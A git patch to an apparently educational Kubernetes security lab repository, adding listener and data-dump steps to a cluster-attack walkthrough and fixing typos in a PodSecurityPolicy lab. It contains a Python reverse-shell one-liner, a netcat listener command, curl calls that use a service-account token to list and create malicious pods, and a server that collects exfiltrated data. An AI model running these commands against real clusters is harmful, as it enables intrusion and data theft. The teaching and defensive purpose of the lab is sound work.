From 4708fd0e2fb9388ab9023ee44599c9b8b3aa13c4 Mon Sep 17 00:00:00 2001
From: nithinjois <nithin.jois@we45.com>
Date: Fri, 21 Sep 2018 17:11:55 +0530
Subject: [PATCH] Minor changes in README and added tornado_server.py in
 K8s-Cluster-Attack directory

---
 .../K8s-Cluster-Attack/README.md              | 21 +++++++++++++++----
 .../malicious_pods/malicious-redis-slave.json |  4 ++--
 .../K8s-Cluster-Attack/tornado_server.py      | 16 ++++++++++++++
 .../PodSecurityPolicy/README.md               |  4 ++--
 4 files changed, 37 insertions(+), 8 deletions(-)
 create mode 100644 K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/tornado_server.py

diff --git a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md
index 78bce6f..964b4b3 100644
--- a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md
+++ b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/README.md
@@ -78,7 +78,7 @@ Server: nginx/1.11.13
 * you should be in the payloads directory. Open `reverse_shell.yml` with `atom reverse_shell.yml`
 * change the external IP address to your VM's IP address with ifconfig. Also make sure that port 1337 is available on your VM
     `["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.3\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"]`
-* open a separate terminal and start your netcat listener.
+* open a separate terminal and start your netcat listener by running `nc -l 1337`
 * Now run:
 
 ```
@@ -114,9 +114,21 @@ Now you can interact with your target app and backend K8s cluster
 * Let's start interacting with K8s API
 
     `curl -s https://10.96.0.1/api/v1/namespaces/default/pods -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure`
+    
     `curl -s https://10.96.0.1/api/v1/namespaces/default/services -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure`
 
-You should see a JSON Dump of all the pods running in the cluster at this time
+You should see a JSON Dump of all the pods and services running in the cluster at this time
+
+Note `clusterIP` of the `redis-service` Service.
+
+Open a new tab in terminal and launch a web-server by running `./tornado_server.py`
+
+Change the value of `MASTERHOST` with the value of `clusterIP`.
+
+Change the value of `LISTENER_IP` with the VM IP that can be fetched by running `ifconfig`
+
+Change the value of `LISTENER_PORT` to the port web-server is running on(`9090`)
+
 ```
 cat > mal-redis.json <<EOF
 {
@@ -139,11 +151,11 @@ cat > mal-redis.json <<EOF
                 "value": "6379"
               },
               {
-                "name": "LISTNER_IP",
+                "name": "LISTENER_IP",
                 "value": "192.168.2.116"
               },
               {
-                "name": "LISTNER_PORT",
+                "name": "LISTENER_PORT",
                 "value": "3999"
               }
             ]
@@ -154,4 +166,5 @@ EOF
 ```
 
 `curl -s https://10.96.0.1/api/v1/namespaces/default/pods -XPOST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" -d@mal-redis.json --insecure`
+
 `curl -s https://10.96.0.1/api/v1/namespaces/default/services -XGET -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" --insecure`
diff --git a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json
index 32fccd7..24f2150 100644
--- a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json
+++ b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json
@@ -18,11 +18,11 @@
                 "value": "6379"
               },
               {
-                "name": "LISTNER_IP",
+                "name": "LISTENER_IP",
                 "value": "192.168.1.5"
               },
               {
-                "name": "LISTNER_PORT",
+                "name": "LISTENER_PORT",
                 "value": "3999"
               }
             ]
diff --git a/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/tornado_server.py b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/tornado_server.py
new file mode 100644
index 0000000..4d9c518
--- /dev/null
+++ b/K8s-Attacking-a-K8s-cluster/K8s-Cluster-Attack/tornado_server.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python
+
+import tornado.ioloop
+import tornado.web
+import pprint
+
+
+class MyDumpHandler(tornado.web.RequestHandler):
+    def post(self):
+        pprint.pprint(self.request)
+        pprint.pprint(self.request.body)
+
+if __name__ == "__main__":
+    tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090)
+    tornado.ioloop.IOLoop.instance().start()
+
diff --git a/K8s-Pod-Security-Policy/PodSecurityPolicy/README.md b/K8s-Pod-Security-Policy/PodSecurityPolicy/README.md
index 71a95c9..28dd2eb 100644
--- a/K8s-Pod-Security-Policy/PodSecurityPolicy/README.md
+++ b/K8s-Pod-Security-Policy/PodSecurityPolicy/README.md
@@ -52,7 +52,7 @@ The focus is to block off some possible attacks and reduce the damage caused by
 * Navigate to the Labs directory with the `Pod-Security-Policy/PodSecurityPolicy` directory
 
 ##### Step 2:
-* Run `apparmor_parse k8s-vul-flask-redis-armor` to apply the profile on the local AppArmor instance
+* Run `apparmor_parser k8s-vul-flask-redis-armor` to apply the profile on the local AppArmor instance
 
 ##### Step 3:
 * Make sure your minikube instance is running
@@ -62,7 +62,7 @@ The focus is to block off some possible attacks and reduce the damage caused by
 * Run `kubectl get pods` and make wait till you get the status of `Running` for the Pod
 
 ##### Step 5:
-* Now run kubectl exec -it secure-ngflask-redis --container secure-vul-flask -- sh` get a shell environment on the Container running flask
+* Now run `kubectl exec -it secure-ngflask-redis --container secure-vul-flask -- sh` get a shell environment on the Container running flask
 * Try to create a file with `touch shell.py`. Observe the results
 * Try to create a file in the `/tmp` directory with `touch /tmp/shell.py`. Observe the results.
 * Try and access `/etc/passwd` or `/etc/shadow` with `cat /etc/passwd` or `cat /etc/shadow`